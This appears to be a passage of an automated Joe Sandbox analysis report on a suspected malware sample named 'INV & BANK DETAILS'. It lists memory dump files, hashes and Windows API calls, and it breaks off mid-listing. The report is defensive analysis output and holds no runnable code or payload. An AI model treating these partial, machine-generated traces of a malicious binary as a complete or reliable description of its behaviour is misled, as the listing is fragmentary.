                                • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Variant$Copy$ClearErrorLast
                                • String ID: NULL Pointer assignment$Not an Object type
                                • API String ID: 2487901850-572801152
                                • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                APIs
                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Window$Enable$Show$MessageSend
                                • String ID:
                                • API String ID: 1871949834-0
                                • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                APIs
                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                • SendMessageW.USER32 ref: 00471AE3
                                • DestroyIcon.USER32(?), ref: 00471AF4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                • String ID:
                                • API String ID: 3611059338-0
                                • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: DestroyWindow$DeleteObject$IconMove
                                • String ID:
                                • API String ID: 1640429340-0
                                • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                APIs
                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                • _wcslen.LIBCMT ref: 004438CD
                                • _wcslen.LIBCMT ref: 004438E6
                                • _wcstok.LIBCMT ref: 004438F8
                                • _wcslen.LIBCMT ref: 0044390C
                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                • _wcstok.LIBCMT ref: 00443931
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                • String ID:
                                • API String ID: 3632110297-0
                                • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Destroy$DeleteMenuObject$IconWindow
                                • String ID:
                                • API String ID: 752480666-0
                                • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                • String ID:
                                • API String ID: 3275902921-0
                                • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                • String ID:
                                • API String ID: 3275902921-0
                                • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                APIs
                                • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                • String ID:
                                • API String ID: 2833360925-0
                                • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                APIs
                                • SendMessageW.USER32 ref: 004555C7
                                • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                • DeleteObject.GDI32(?), ref: 00455736
                                • DeleteObject.GDI32(?), ref: 00455744
                                • DestroyIcon.USER32(?), ref: 00455752
                                • DestroyWindow.USER32(?), ref: 00455760
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                • String ID:
                                • API String ID: 3691411573-0
                                • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                APIs
                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                • LineTo.GDI32(?,?,?), ref: 004472AC
                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                • LineTo.GDI32(?,?,?), ref: 004472C6
                                • EndPath.GDI32(?), ref: 004472D6
                                • StrokePath.GDI32(?), ref: 004472E4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                • String ID:
                                • API String ID: 372113273-0
                                • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                APIs
                                • GetDC.USER32(00000000), ref: 0044CC6D
                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CapsDevice$Release
                                • String ID:
                                • API String ID: 1035833867-0
                                • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                APIs
                                • __getptd.LIBCMT ref: 0041708E
                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                • __amsg_exit.LIBCMT ref: 004170AE
                                • __lock.LIBCMT ref: 004170BE
                                • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                • _free.LIBCMT ref: 004170EE
                                • InterlockedIncrement.KERNEL32(00A32D10), ref: 00417106
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                • String ID:
                                • API String ID: 3470314060-0
                                • Opcode ID: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                • Opcode Fuzzy Hash: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                APIs
                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                • String ID:
                                • API String ID: 3495660284-0
                                • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                APIs
                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
